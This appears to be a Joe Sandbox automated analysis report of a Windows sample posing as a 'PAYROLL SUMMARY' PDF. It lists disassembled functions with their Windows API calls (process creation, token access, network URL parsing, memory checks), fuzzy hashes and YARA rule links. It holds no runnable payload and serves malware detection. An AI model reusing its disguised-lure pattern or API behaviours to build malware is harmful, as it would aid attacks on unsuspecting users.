Opcode ID: 9da8d4fe0e6b1d003e4520077af05940d5c573d897b390449344206c145ffe3d
Instruction ID: 31da608cc5e6d592fa7aec13c3ab46adc90d67d9135d62fc0251ed0971202ffc
Opcode Fuzzy Hash: 9da8d4fe0e6b1d003e4520077af05940d5c573d897b390449344206c145ffe3d
Instruction Fuzzy Hash: 7C1166B5D00209EFDB41CF99D5449EEFBB9FB08310F508166E915E3620D731AA618F90

Function 002DB8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002DB8FE
_memset.LIBCMT ref: 002DB90D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00317F20,00317F64), ref: 002DB93C
CloseHandle.KERNEL32 ref: 002DB94E

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 81aa0d53f664d16a5df63234c380af75656d1168d3ce160b9efb7f144924d12a
Instruction ID: 4b5a9829c5de6470193b24f3e24bc2d69adb39657dee7d87671068ecb479b214
Opcode Fuzzy Hash: 81aa0d53f664d16a5df63234c380af75656d1168d3ce160b9efb7f144924d12a
Instruction Fuzzy Hash: 8CF082B2554340BBF2516B65AC09FFB3BADEB0C754F048061BB09D5292D7718D118BA9

Function 002B6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 002B6E88

Part of subcall function 002B794E: _memset.LIBCMT ref: 002B7983

_memmove.LIBCMT ref: 002B6EAB
_memset.LIBCMT ref: 002B6EB8
LeaveCriticalSection.KERNEL32(?), ref: 002B6EC8

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: d51e542b5a06a0430359bc15a39a68b2d98dc9afed40f994dfe4fe7373e6680d
Instruction ID: 9fd11ffd3af348fb9c09d00378cc5a134bd64f6e3bc18c8d5e7f013a0e409028
Opcode Fuzzy Hash: d51e542b5a06a0430359bc15a39a68b2d98dc9afed40f994dfe4fe7373e6680d
Instruction Fuzzy Hash: FAF0543A100200ABCF416F55EC89A8ABB29FF45360B04C061FE0D5E216C731AD21DFB5

Function 002DC00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 002512F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0025134D
Part of subcall function 002512F3: SelectObject.GDI32(?,00000000), ref: 0025135C
Part of subcall function 002512F3: BeginPath.GDI32(?), ref: 00251373
Part of subcall function 002512F3: SelectObject.GDI32(?,00000000), ref: 0025139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 002DC030
LineTo.GDI32(00000000,?,?), ref: 002DC03D
EndPath.GDI32(00000000), ref: 002DC04D
StrokePath.GDI32(00000000), ref: 002DC05B

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 6aef2ad1a398c11d3a59e4da2467707e30c91c76d89f38bf68896e9d66c8ae01
Instruction ID: 6a09e6274ddf82018bd0ca0fe8322fc556e053abf07345ced53a008e16e3338a
Opcode Fuzzy Hash: 6aef2ad1a398c11d3a59e4da2467707e30c91c76d89f38bf68896e9d66c8ae01
Instruction Fuzzy Hash: A5F0543144125AB7DB136F54AD0EFCE3F596F05312F148001FA12611E1C7755965CF99

Function 002AA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 002AA399
GetWindowThreadProcessId.USER32(?,00000000), ref: 002AA3AC
GetCurrentThreadId.KERNEL32 ref: 002AA3B3
AttachThreadInput.USER32(00000000), ref: 002AA3BA

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 74afabe083b992bb721bb30fa5ea16b02b309f225a304c91f87ea37aa66f6639
Instruction ID: 40a752c2afda1f6cef574bceae926535a75a42b6295bbf414befe698bfe473a0
Opcode Fuzzy Hash: 74afabe083b992bb721bb30fa5ea16b02b309f225a304c91f87ea37aa66f6639
Instruction Fuzzy Hash: E4E03931942228BBDB601FA2ED0CEE73F1CEF167A1F048066F50A84460CBB1C950CBE4

Function 00252218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00252231
SetTextColor.GDI32(?,000000FF), ref: 0025223B
SetBkMode.GDI32(?,00000001), ref: 00252250
GetStockObject.GDI32(00000005), ref: 00252258
GetWindowDC.USER32(?,00000000), ref: 0028C0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 0028C0E0
GetPixel.GDI32(00000000,?,00000000), ref: 0028C0F9
GetPixel.GDI32(00000000,00000000,?), ref: 0028C112
GetPixel.GDI32(00000000,?,?), ref: 0028C132
ReleaseDC.USER32(?,00000000), ref: 0028C13D

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 8e3c7ef9f24a2dc109b6a4514d4822ff7827babf7b68767cb33d73de10c15aac
Instruction ID: 4599301931f6b76c6c947f350ec690808376db6ae225170c138788d151adc76a
Opcode Fuzzy Hash: 8e3c7ef9f24a2dc109b6a4514d4822ff7827babf7b68767cb33d73de10c15aac
Instruction Fuzzy Hash: 65E06D32901245EADF615FA4FD0D7D83B10EB15332F14C367FAAE880E187718994DB21

Function 002A8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 002A8C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,002A882E), ref: 002A8C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002A882E), ref: 002A8C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,002A882E), ref: 002A8C7E

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: eb66763343a1fc984fb4ee9aa9a54783b73fac262eab38cc64d3d3d69927c46a
Instruction ID: ab95421b8a66ebd0bbf7e4b129130fd66e4d3930b528bd1960f32c2df61a203b
Opcode Fuzzy Hash: eb66763343a1fc984fb4ee9aa9a54783b73fac262eab38cc64d3d3d69927c46a
Instruction Fuzzy Hash: 87E08636A47211DBD7A05FB07E0CB563BACEF51BA2F098829B687CA040DA348C41CF65

Function 00292187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00292187
GetDC.USER32(00000000), ref: 00292191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 002921B1
ReleaseDC.USER32(?), ref: 002921D2

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 403a3a3fe9f273c432bf929e75d0800159059a5f3f748c6d3f506b6e666d3ad0
Instruction ID: e2a8afe6e484d2b4c9c094b6bd3ea347b4f69835cabe70d22588c2dc5dda780a
Opcode Fuzzy Hash: 403a3a3fe9f273c432bf929e75d0800159059a5f3f748c6d3f506b6e666d3ad0
Instruction Fuzzy Hash: 7DE03271810204EFCB409F60E90CA9D7BA9EB0C311F208026E82A93620CB788A519F88

Function 0029219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0029219B
GetDC.USER32(00000000), ref: 002921A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 002921B1
ReleaseDC.USER32(?), ref: 002921D2

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: e2bf3183a725b9d673dc5580bf61a7f7767b886e02b13bb60b699127dcc59325
Instruction ID: 7b09abbb30b0893b0a9c500e9a54256d1f6c5d9af0f654e1958308a5d3fc6c96
Opcode Fuzzy Hash: e2bf3183a725b9d673dc5580bf61a7f7767b886e02b13bb60b699127dcc59325
Instruction Fuzzy Hash: D0E0E575C11204AFCB419F60E90C69D7BE9EB4C311F108026F96A97620DB789A419F88

Function 002563A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%., xrefs: 002563AE

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID:
String ID: %.
API String ID: 0-3490990516
Opcode ID: 31405460c19fc6bcd8f57cdc94f2802d0873302631c725cf69642913a8237037
Instruction ID: 054fed2e4f77d9fd191f56e8e318fc0a553e66886e8b25e052e2d8c2a1b9e6f7
Opcode Fuzzy Hash: 31405460c19fc6bcd8f57cdc94f2802d0873302631c725cf69642913a8237037
Instruction Fuzzy Hash: 2AB1D57192010A9BCF24EF94C4999FDB7B9FF44312F944026ED02A7291EB309DADCB59

Function 002CB1B7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 002CB2C3

Strings

xr1, xrefs: 002CB325
xr1, xrefs: 002CB2F9

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: __itow_s
String ID: xr1$xr1
API String ID: 3653519197-2703582721
Opcode ID: 93f3f46180502e3f864315586a3b15274f451711646f490bb077e2d24188c37a
Instruction ID: 7afde252084a008788688f5427b427bd39f835e2475dd354d22e85d9fae6a606
Opcode Fuzzy Hash: 93f3f46180502e3f864315586a3b15274f451711646f490bb077e2d24188c37a
Instruction Fuzzy Hash: 68B1C030A14209AFCB25DF54C892EAEB7B9FF58300F14855DF9059B282EB70D9A5CB60

Function 002BB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0026FEC6: _wcscpy.LIBCMT ref: 0026FEE9

Part of subcall function 00259997: __itow.LIBCMT ref: 002599C2
Part of subcall function 00259997: __swprintf.LIBCMT ref: 00259A0C

__wcsnicmp.LIBCMT ref: 002BB298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 002BB361

Strings

LPT, xrefs: 002BB292

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 2dd4e3d2cf2c7b19817c7ec0ed302a6fb9d3ef2b91a967f3741358efae8fe246
Instruction ID: d93f58b58fe7d52d713cd3532f7a6f5f78017d13bc39458a67300160087f9cbf
Opcode Fuzzy Hash: 2dd4e3d2cf2c7b19817c7ec0ed302a6fb9d3ef2b91a967f3741358efae8fe246
Instruction Fuzzy Hash: C161C475A20215EFCB15DF54C881EEEB7F4EF08310F15409AF846AB291DBB0AE94CB50

Function 00298A77 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00298B1E
_memmove.LIBCMT ref: 00298B78

Strings

Oa&, xrefs: 00298BF2, 0029E39A, 0029E3B6

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _memmove
String ID: Oa&
API String ID: 4104443479-711773428
Opcode ID: 466d9c76244f1a6bb1de1fbcd2929a63e44dd876e7e773da6efca5abe0ca89af
Instruction ID: 5c95fa628d561e46870c9eeb97339e5a139ab2d880f57ebb45febd95b73767c4
Opcode Fuzzy Hash: 466d9c76244f1a6bb1de1fbcd2929a63e44dd876e7e773da6efca5abe0ca89af
Instruction Fuzzy Hash: C151707091061ADFCF24CF68D484AAEB7F1FF45318F14456AE85AD7240EB31A9A5CB50

Function 00262AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00262AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 00262AE1

Strings

@, xrefs: 00262AD5

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: bbfa2784e94a3e05af38aa38e6beb6b501192fe072b4c4d930a46da39249f9c7
Instruction ID: 743e62668ad2a9325d10eb68d9dcbdb0fd2bdd135802c0120152bb409db32268
Opcode Fuzzy Hash: bbfa2784e94a3e05af38aa38e6beb6b501192fe072b4c4d930a46da39249f9c7
Instruction Fuzzy Hash: 0D514571428744DBD320AF10D88ABAFBBE8FB84315F42885DF5D9410A1DB708969CB2A

Function 002B99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0025506B: __fread_nolock.LIBCMT ref: 00255089

_wcscmp.LIBCMT ref: 002B9AAE
_wcscmp.LIBCMT ref: 002B9AC1

Strings

FILE, xrefs: 002B99FA

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 1b2024c5b9f5eb46cfd16b57a00c32283e13b6f42217a31400d012c17c6d5116
Instruction ID: ac2c8fd5a5062efc648ce692cb85df5244c377af4c52528a56b277c5fc77994f
Opcode Fuzzy Hash: 1b2024c5b9f5eb46cfd16b57a00c32283e13b6f42217a31400d012c17c6d5116
Instruction Fuzzy Hash: ED41F971A10619BBDF20AEA4DC45FEFB7FDDF49714F000069FA00A71C1D6719A548BA5

Function 0029099E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 002909A9

Strings

Dt1, xrefs: 0025A477
Dt1, xrefs: 0025A2B1

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ClearVariant
String ID: Dt1$Dt1
API String ID: 1473721057-1670705480
Opcode ID: 4e3be3734545f7bffdf6e8daea5e78a11182b8435a157ff45c91396563ae3c1f
Instruction ID: af3b314e9d0b3adb1698ab02d8d6b5952ae8044549a15b365aa9ae62f26c8957
Opcode Fuzzy Hash: 4e3be3734545f7bffdf6e8daea5e78a11182b8435a157ff45c91396563ae3c1f
Instruction Fuzzy Hash: 4C5114786283429FC754CF19C081A2ABBF1BB98359F54895CE9818B321D731EC95CB86

Function 002C2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002C2892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 002C28C8

Strings

|, xrefs: 002C2899

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 57b45d24ed28e4731beb40caaf0a633a4e15e2db37601dad6fb44873dc2b4638
Instruction ID: c5de945a881e5851ea88ca29286973154e717408ef1033e77658dcd039605200
Opcode Fuzzy Hash: 57b45d24ed28e4731beb40caaf0a633a4e15e2db37601dad6fb44873dc2b4638
Instruction Fuzzy Hash: 95310C71810119AFCF01DFA1DC85EEEBFB9FF08310F104169F815A6165DA31596ADF60

Function 002D6CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 002D6D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 002D6DC2

Strings

static, xrefs: 002D6D22

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: d0a4a7ec458531aca052d000eaaaace5a8b5f38b773026157d5c53285dd39cea
Instruction ID: 96995a8f3b5b41b6b00d219a7bf30735b1b0affe6ccd39e56ea1c4599b7ec6ff
Opcode Fuzzy Hash: d0a4a7ec458531aca052d000eaaaace5a8b5f38b773026157d5c53285dd39cea
Instruction Fuzzy Hash: 4331A171220205AEDB109F64DC44BFB73B9FF48720F10851AF8A687290CB31ACA1CB64

Function 002B2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002B2E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002B2E3B

Strings

0, xrefs: 002B2DF9

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 22efa0bdf62af44dbf601f20862c51a12186c016616f32c30afd507db8f483ce
Instruction ID: ad949300621ecc0bfeca0ca438fc40ee2f508e4783406d8bf63a970f4f453e91
Opcode Fuzzy Hash: 22efa0bdf62af44dbf601f20862c51a12186c016616f32c30afd507db8f483ce
Instruction Fuzzy Hash: 02310931A20306EBEB25CF49D8457EEBBB9FF45380F144029E985A61A1D770F968CB11

